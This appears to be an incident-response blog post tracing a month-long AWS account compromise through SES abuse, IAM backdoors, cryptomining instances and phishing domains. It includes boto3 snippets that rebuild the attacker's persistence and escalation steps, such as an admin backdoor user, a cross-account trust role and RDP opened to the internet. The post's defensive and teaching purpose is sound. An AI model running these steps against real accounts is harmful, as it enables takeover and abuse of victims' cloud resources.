The curious case of DangerDev@protonmail.me

January 31, 2024

An AWS incident response story

Recently we worked on a very interesting incident response case in a customer's AWS environment. In this blog we want to share a detailed story of this case, including the techniques used by the threat actor (TA). We hope that this is helpful for people protecting AWS accounts around the world.

Background

It all started on a Friday afternoon when we got a call asking for support with an ongoing AWS incident. The trigger for the incident was a suspicious support case that was created within one of the AWS accounts of our client. The support case wasn't raised by the client themselves, and it triggered an alert from AWS to the client because it was a request to increase Simple Email Service (SES) sending limits. However, our client wasn't using SES…

Due to client confidentiality we have censored certain information.

SES is a popular target for attackers as it can be abused to send out phishing and spam campaigns at massive rates and from a trusted sender (Amazon). We talked about it before in an incident write-up, and there's also an excellent blog on SES abuse by Permiso Security.

Reading Guide

Please consider that cloud attack techniques are challenging to categorize into specific MITRE phases due to their multipurpose nature and the ambiguity of threat actor intent.

For instance, an attacker’s actions related to user activities may fit into the persistence phase, but could also serve to evade defenses by blending in with specific usernames and roles. Additionally, threat actors often move between phases, such as transitioning from traditional persistence activities to subsequent discovery activities with newly created users. The story is written in chronological order.

Incident overview

The malicious activity took place over the course of a month. Within that month there were three distinct phases of activity. We have separated this write-up into the three phases of the attack and used the MITRE ATT&CK framework techniques to categorize our findings.

Phase 1

The support case that triggered the incident response was opened by an IAM user called DangerDev@protonmail.me. According to our client this was not a legitimate user, so it was time to figure out how this all happened.

Initial access

Access to the environment was achieved through an accidentally exposed long term access key belonging to an IAM user. The access key belonged to a user with Administrator Access. We cannot provide additional details as to where the access key was stored.

Discovery

What do you do if you just received a fresh access key to start your hacking adventure with?

SES discovery

If you think the answer is discovering and enumerating SES, you are correct. Repeated calls were made towards SES with GetSendQuota and ListIdentities. These calls are used to get an idea of how many emails can be sent at once and which email addresses and domains are registered to send emails.
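For reference, a minimal boto3 sketch of what this discovery step looks like when scripted. The session setup and region are hypothetical; only the two API calls mirror what we observed:

```python
import boto3

# Hypothetical session, e.g. initialized with a stolen long-term access key
session = boto3.Session(region_name="us-east-1")
ses = session.client("ses")

# GetSendQuota: how many emails can be sent per 24 hours and per second
quota = ses.get_send_quota()
print(quota["Max24HourSend"], quota["MaxSendRate"], quota["SentLast24Hours"])

# ListIdentities: which email addresses and domains are verified for sending
identities = ses.list_identities()
print(identities["Identities"])
```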

The SES activity occurred on two separate days and was the only observed activity in the first two weeks, which was interesting. In other engagements we have seen that, after discovering an active access key, a TA will immediately launch whatever they can before they get kicked out.

User discovery

After approximately two weeks the TA came back and ran ListUsers to list the IAM users in the AWS account.

The discovery commands were most likely automated based on the user-agent and the frequency of the calls performed.

An observation for this phase is that the TA isn't running the typical enumeration commands such as GetCallerIdentity and ListAttachedUserPolicies, possibly because such calls are more likely to trigger detection.

Persistence

After all of the above it’s time for our main character to make an entrance. A CreateUser call was made for a new account DangerDev@protonmail.me.

After this action the TA performed a CreateLoginProfile call, which is used to give a user the ability to log in through the AWS management console.

Privilege Escalation

The AdministratorAccess policy was attached to the newly created account with AttachUserPolicy. This policy is an AWS managed policy that provides full access to AWS services and resources.
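Taken together, the persistence and privilege escalation steps map to three IAM API calls. A minimal boto3 reconstruction; the password value is obviously a placeholder, the calls mirror the CloudTrail events described above:

```python
import boto3

iam = boto3.client("iam")

# CreateUser: the new backdoor identity
iam.create_user(UserName="DangerDev@protonmail.me")

# CreateLoginProfile: enable console sign-in for the new user
iam.create_login_profile(
    UserName="DangerDev@protonmail.me",
    Password="<hypothetical-password>",
    PasswordResetRequired=False,
)

# AttachUserPolicy: grant full administrative access via the AWS managed policy
iam.attach_user_policy(
    UserName="DangerDev@protonmail.me",
    PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess",
)
```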

This marked the end of the activity with the original IAM user. Most of the subsequent activity was performed with the DangerDev user, and some new identities will enter this story.

Phase 2

In the second phase of the attack, which lasted approximately one week, the TA was mostly testing out their access and what kind of activities they could perform within the environment.

Discovery

With the newly created account the TA performed additional discovery activities, which were probably more closely aligned with their malicious intentions. The following calls were made in less than an hour.

The majority of this activity relates to EC2 instances:

Using the sessionCredentialFromConsole field we can identify activity performed through the AWS management console, which is quite interesting as it's less likely this activity was scripted. This example shows a DescribeSecurityGroups event, which lists all security groups in the account and is a nice bridge to the next phase of the attack.
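For defenders, a small sketch of how console-driven activity can be separated from scripted activity in exported CloudTrail records using this field. The file name and local export format are assumptions:

```python
import gzip
import json

# Assumes a locally downloaded CloudTrail log file (path is hypothetical)
with gzip.open("cloudtrail-export.json.gz", "rt") as f:
    records = json.load(f)["Records"]

for event in records:
    # sessionCredentialFromConsole is "true" for calls made via the console
    if event.get("sessionCredentialFromConsole") == "true":
        print(event["eventTime"], event["eventName"],
              event.get("userIdentity", {}).get("arn"))
```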

Persistence

After the discovery activity the TA performed the following actions in a timespan of 30 minutes:

  • CreateKeyPair
  • CreateSecurityGroup
  • CreateDefaultVpc
  • AuthorizeSecurityGroupIngress
  • RunInstances

In short, the TA launched an EC2 instance, and as part of that process a VPC with a security group was created. The TA modified the security group to allow for external RDP access as shown below:
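A boto3 sketch of that sequence. The key name, security group name, AMI ID and source CIDR are purely illustrative and not the values used by the TA; port 3389 reflects the RDP access described above:

```python
import boto3

ec2 = boto3.client("ec2")

# CreateKeyPair: key material for remote access to the instance
ec2.create_key_pair(KeyName="hypothetical-key")

# CreateDefaultVpc / CreateSecurityGroup: network setup for the instance
vpc_id = ec2.create_default_vpc()["Vpc"]["VpcId"]
sg_id = ec2.create_security_group(
    GroupName="hypothetical-sg", Description="rdp", VpcId=vpc_id
)["GroupId"]

# AuthorizeSecurityGroupIngress: open RDP (3389/tcp) to the internet
ec2.authorize_security_group_ingress(
    GroupId=sg_id,
    IpPermissions=[{
        "IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389,
        "IpRanges": [{"CidrIp": "0.0.0.0/0"}],
    }],
)

# RunInstances: the small test instance launched first
ec2.run_instances(
    ImageId="ami-00000000000000000",   # placeholder AMI ID
    InstanceType="t2.micro",
    KeyName="hypothetical-key",
    SecurityGroupIds=[sg_id],
    MinCount=1, MaxCount=1,
)
```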

We will discuss the EC2 instance creation next, because the TA did something interesting.

Impact

What we saw was that the TA first created a test instance with instance type t2.micro, which is one of the smallest instances and definitely not suitable for crypto mining. It seems the TA wanted to test whether they could successfully launch and access their EC2 machine, because the instance was terminated by the TA shortly after.

After this test it was time for the heavy hitters. The TA launched three instances with instance type p3.16xlarge.

This instance type is much better suited for crypto mining as it has GPUs with 128 GB of GPU memory and 64 vCPUs. However, there was a problem launching some of the instances due to account limits.
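When an account's limits are too low for an instance family, RunInstances fails with a client error. A hedged sketch of how that surfaces; the exact error code returned in this case is an assumption:

```python
import boto3
from botocore.exceptions import ClientError

ec2 = boto3.client("ec2")

try:
    ec2.run_instances(
        ImageId="ami-00000000000000000",   # placeholder AMI ID
        InstanceType="p3.16xlarge",
        MinCount=1, MaxCount=1,
    )
except ClientError as err:
    # Typically something like VcpuLimitExceeded when account limits block the launch
    print(err.response["Error"]["Code"], err.response["Error"]["Message"])
```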

The other machine launched successfully but was terminated after approximately one hour. After this activity it stayed mostly quiet for another two weeks.

Phase 3

The bulk of the activity took place in the last phase of the attack and some of the actions ultimately led to discovery of the attack.

Persistence & Defense Evasion

The majority of the activities are related to user and role creation or modification. The TA used an interesting technique to achieve persistent access to the AWS account.

User creation

Over the course of this attack the TA performed a number of activities related to users and roles. The graphic below is intended to show you the activities that were performed.

The TA manually created a user account called ses.

The username ses is interesting because it mimics the accounts that are automatically created when using SES. Those legitimate accounts can be identified because they follow the naming convention ses-smtp-user.<date-time>, and in the corresponding event you can see it was invoked by the SES console.

Therefore the creation of an account with the name ses might also be an attempt to evade detection.

Additionally, the TA created access keys for existing accounts; due to confidentiality we can't name the accounts in question. We've added an example of this activity for the ses account below.

Role creation

One of the more interesting actions observed in this attack is the creation of a role that allows identities from an external AWS account to assume a privileged role in the victim tenant. That sounds quite complicated, but this is how it works:
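A minimal sketch of how such a backdoor role can be created with boto3, assuming a standard cross-account trust policy; the role name and external account ID are taken from the events described below, the rest of the policy structure is an assumption:

```python
import json
import boto3

iam = boto3.client("iam")

# Trust policy that lets principals in an EXTERNAL (attacker-controlled)
# AWS account assume this role inside the victim account
trust_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::671050157472:root"},
        "Action": "sts:AssumeRole",
    }],
}

# CreateRole: a role name chosen to blend in with existing landing-zone roles
iam.create_role(
    RoleName="AWSLanding-Zones-ConfigRecorderRoles",
    AssumeRolePolicyDocument=json.dumps(trust_policy),
)
```

Once such a role exists, gaining access is a single sts:AssumeRole call from the external account, which matches the AssumeRole event discussed further down.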

And what it looks like in CloudTrail:

Notice the external AWS account ID and also the roleName. The roleName is AWSLanding-Zones-ConfigRecorderRoles, which was very similar to an existing role name.

The second role has the same purpose, but for a different external AWS account. It also has a name very similar to an existing role: AWSeservedSSO_* vs. AWSReservedSSO_*.

After the creation of both roles, an AssumeRole event was observed as shown below. The TA assumed the role from their own account (671050157472).

If you see any of these accounts in your environment please reach out to us or start your incident response process as they’re confirmed malicious by AWS:

  • 265857590823
  • 671050157472

We haven't seen this type of attack technique before. It's a pretty clever way of establishing backdoor access that doesn't require an IAM user inside the victim account.

Privilege escalation

In addition to the aforementioned activities, such as the creation of users and roles with privileged access, the TA performed activities that could be classified as attempts to escalate privileges.

Using AttachRolePolicy, the TA added the AWS managed AdministratorAccess policy to the role that allows for external access:

Another interesting event is UpdateLoginProfile, where the TA used the initially compromised account to update the console password of another account.
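In API terms, these two escalation steps look roughly as follows; the target username and password in the UpdateLoginProfile call are withheld and therefore placeholders here:

```python
import boto3

iam = boto3.client("iam")

# AttachRolePolicy: full admin rights on the externally assumable backdoor role
iam.attach_role_policy(
    RoleName="AWSLanding-Zones-ConfigRecorderRoles",
    PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess",
)

# UpdateLoginProfile: reset the console password of an existing user
iam.update_login_profile(
    UserName="<existing-user>",          # redacted / hypothetical
    Password="<hypothetical-password>",
    PasswordResetRequired=False,
)
```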

Discovery

In this phase the TA also performed discovery activities such as:

  • ListBuckets
  • ListGroupsForUser
  • ListInstanceProfiles
  • ListSSHPublicKeys
  • SimulatePrincipalPolicy

Most of the above actions are pretty self-explanatory; however, we want to highlight SimulatePrincipalPolicy, as this is a technique that has not been reported on before (or at least we couldn't find it).

So how does this work? Let's start with the event that is generated first:

The AWS Policy Simulator allows users to test an existing policy, recorded in the policySourceArn field, against a set of actions, recorded in the actionNames field. This helps answer the question: can I perform action X with policy Y?

The fact that the TA used this service to test certain actions tells us that they were interested in actions related to the SSM service and AWS Secrets Manager.
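A hedged sketch of the underlying API call. The principal ARN and the specific action names are illustrative, chosen to match the SSM and Secrets Manager focus described above:

```python
import boto3

iam = boto3.client("iam")

# SimulatePrincipalPolicy: dry-run whether a given principal can perform actions
response = iam.simulate_principal_policy(
    PolicySourceArn="arn:aws:iam::111111111111:user/ses",   # hypothetical principal
    ActionNames=[
        "ssm:SendCommand",                 # illustrative SSM action
        "secretsmanager:GetSecretValue",   # illustrative Secrets Manager action
    ],
)

for result in response["EvaluationResults"]:
    # EvalDecision is allowed, implicitDeny or explicitDeny
    print(result["EvalActionName"], result["EvalDecision"])
```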

Defense evasion

Interestingly enough, the TA put quite some effort into hiding their traces:

  • Removing IAM users with DeleteUser
  • Cleaning up policies with DetachUserPolicy and DeleteUserPolicy
  • Deactivating long term access keys with UpdateAccessKey
  • Cleaning up long term access keys with DeleteAccessKey
  • Inspecting GuardDuty findings with ListFindings and GetFindings
  • Creating a LightSail instance upon discovery with CreateInstances

It was interesting to see that the TA modified users and access keys during the attack before they were discovered. It shows that they wanted to stay under the radar for a little longer. We would like to focus on the GuardDuty and LightSail actions as these are less commonly observed and offer some great insights.
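For defenders, these clean-up events are worth hunting for. A small sketch using the CloudTrail LookupEvents API, which covers roughly the last 90 days of management events; the event-name list mirrors the bullets above:

```python
import boto3

cloudtrail = boto3.client("cloudtrail")
paginator = cloudtrail.get_paginator("lookup_events")

# IAM clean-up events observed in this case; rarely benign in bulk
suspect_events = [
    "DeleteUser", "DetachUserPolicy", "DeleteUserPolicy",
    "UpdateAccessKey", "DeleteAccessKey",
]

for name in suspect_events:
    # LookupEvents accepts only one lookup attribute per call
    for page in paginator.paginate(
        LookupAttributes=[{"AttributeKey": "EventName", "AttributeValue": name}]
    ):
        for event in page["Events"]:
            print(event["EventTime"], event["EventName"], event.get("Username"))
```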

GuardDuty

Looking at the GuardDuty related activities, we believe it was one action performed by the TA that resulted in the events below:

What was interesting is that the user-agent was the Amazon Relational Database Service (RDS) console; it seems that the TA accessed GuardDuty from the RDS console. This is also visible in the ListFindings event, which is filtered for findings related to RDS resources.
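In boto3 terms, the inspection boils down to ListFindings followed by GetFindings against the account's detector. The detector lookup is generic, and the RDS-related filter seen in the actual event is omitted in this sketch:

```python
import boto3

guardduty = boto3.client("guardduty")

# There is normally one GuardDuty detector per account and region
detector_id = guardduty.list_detectors()["DetectorIds"][0]

# ListFindings: the TA's call was additionally filtered for RDS-related findings
finding_ids = guardduty.list_findings(DetectorId=detector_id)["FindingIds"]

# GetFindings: retrieve full details, i.e. see exactly what defenders would see
# (GetFindings accepts up to 50 finding IDs per call)
findings = guardduty.get_findings(DetectorId=detector_id, FindingIds=finding_ids[:50])
for finding in findings["Findings"]:
    print(finding["Type"], finding["Severity"], finding["Title"])
```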

LightSail

For those who primarily use EC2 or ECS for compute there’s another compute resource in AWS that threat actors target. It’s often overlooked as it isn’t part of the regular AWS compute offering nor does it integrate with IAM. It’s called LightSail and it’s basically a virtual private server offering.

What happened is that our client started removing access for the TA. However, at this point they didn't yet know that the TA had created an access key for another user. So when the TA noticed they had lost access to their account, they quickly used another account to create a LightSail instance. This resulted in an error because the account wasn't verified.

Approximately an hour later the request went through successfully and the TA was able to launch a LightSail instance.

The TA accessed the associated RDP settings. Access was soon revoked as the instance was deleted within an hour. We were not able to investigate the LightSail instance to determine what happened within that hour.
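A rough reconstruction of the LightSail activity. The instance name, availability zone, blueprint and bundle IDs are assumptions; the two calls, creating the instance and retrieving its RDP access details, are what matters:

```python
import boto3

lightsail = boto3.client("lightsail")

# CreateInstances: this is the call that initially failed on the unverified account
lightsail.create_instances(
    instanceNames=["hypothetical-instance"],
    availabilityZone="us-east-1a",
    blueprintId="windows_server_2022",   # illustrative Windows blueprint
    bundleId="medium_win_2_0",           # illustrative bundle size
)

# GetInstanceAccessDetails: one way to retrieve the RDP connection settings
access = lightsail.get_instance_access_details(
    instanceName="hypothetical-instance",
    protocol="rdp",
)
print(access["accessDetails"]["ipAddress"], access["accessDetails"]["username"])
```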

Impact

No story is complete without some impact. In this case there were quite a few things the TA did which gave us some insights into their objectives. Roughly speaking, we can categorize these into three actions:

  1. Cryptomining
  2. Phishing and spam through SES
  3. Setting up fake domains for spear phishing and scams

Cryptomining

Luckily it didn't last long, because this activity closely preceded the initial discovery of the incident. But the TA did create several powerful and expensive instances in the AWS account. All of the below instance types have GPUs enabled and significant CPU power.

The instances weren’t available for investigation and no VPC flow logs were available to perform further analysis.

To access the machines the TA created new inbound rules to allow traffic on port 22:

Phishing and spam through SES

The TA was mostly interested in SES for further malicious activity. We can’t share too many details on the emails that were sent out. However they were mostly aimed at individuals to phish for cryptocurrency exchange credentials and general spam.

What is interesting and what ultimately led to discovery of the incident is that the AWS Trust & Safety team communicated with the TA through a support case. Here’s what happened:

  1. TA requests an increase in the SES sending quota (to send more spam)
  2. AWS requests more details
  3. TA responds in the support case
  4. Quota increased by AWS

As part of the SES abuse the TA created the following identities with CreateEmailIdentity.

Most of the domains are targeting Japanese websites, which is pretty interesting in itself with regard to attribution.
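CreateEmailIdentity is part of the SES v2 API. A short sketch with a placeholder domain; the actual identities created by the TA are not repeated here:

```python
import boto3

sesv2 = boto3.client("sesv2")

# CreateEmailIdentity: register a domain (or email address) as a sending identity;
# for domains, SES returns DKIM tokens that must be published in DNS to verify
response = sesv2.create_email_identity(EmailIdentity="example-lookalike-domain.com")
print(response["IdentityType"], response["DkimAttributes"]["Tokens"])
```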

Fake domains mimicking PayPal

The TA also knew their way around Amazon Route 53; four domains were created with RegisterDomain.

There’s no need to guess what these domains were intended to be used for. The domains were short lived and quickly taken offline, which brings us to the end of the malicious activity observed.

The threat actor

We noticed that there’s not a lot of threat intelligence on cloud threat actors. While we were completing this write-up Datadog published an excellent incident write-up which has some overlapping indicators for the ASN and IP addresses used by the TA. We’ve added all the IOCs below, if you’re working for an organization in the TI field and have more information please do reach out.

With that in mind, some observations from our side on the TA:

  • They know their way around AWS; they go beyond basic EC2 abuse and have the skills to set up (more advanced) persistence methods;
  • Uses a combination of automation scripts and hands-on keyboard activity. For example, the testing and enumeration of AWS access keys was definitely automated, as we kept seeing the original access keys being used to make calls at set times. However, they also performed lots of activity through the management console;
  • Some OPSEC was observed; as an example, the TA didn't use the GetCallerIdentity command, which is commonly observed in attacks as it's basically a whoami for AWS environments. Additionally, we didn't see many failed API calls, which is often an indicator of a less skilled TA trying every possible action;
  • Financially motivated, ultimately their goal seemed to be to perform (spear)phishing for financial gain through PayPal lures and cryptocurrency phishing;
  • The TA was mostly using Indonesia-based IP addresses, outside of commercial VPN solutions.

Conclusion

We hope you made it this far, we know it’s quite the read, but we believe this is a story worth sharing with all the technical details. There are lessons to be learned from this incident, which we will save for another blog post.

Last but definitely not least, we want to thank our client for allowing us to write this story. Your willingness to share this information will help others.

Indicators of Compromise